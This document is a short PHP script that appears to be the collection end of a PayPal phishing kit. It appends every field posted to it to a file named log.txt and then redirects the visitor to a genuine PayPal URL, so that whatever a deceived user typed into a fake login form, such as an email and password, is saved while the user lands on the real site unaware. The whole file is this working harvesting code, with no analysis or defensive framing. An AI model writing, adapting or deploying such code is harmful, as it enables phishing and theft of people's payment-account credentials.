<?php
header ('Location: https://www.paypal.com/cgi-bin/webscr?dispatch=5885d80a13c0db1f941d8253416939c6057d1d6643efcf2acedfaebb3222b360 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>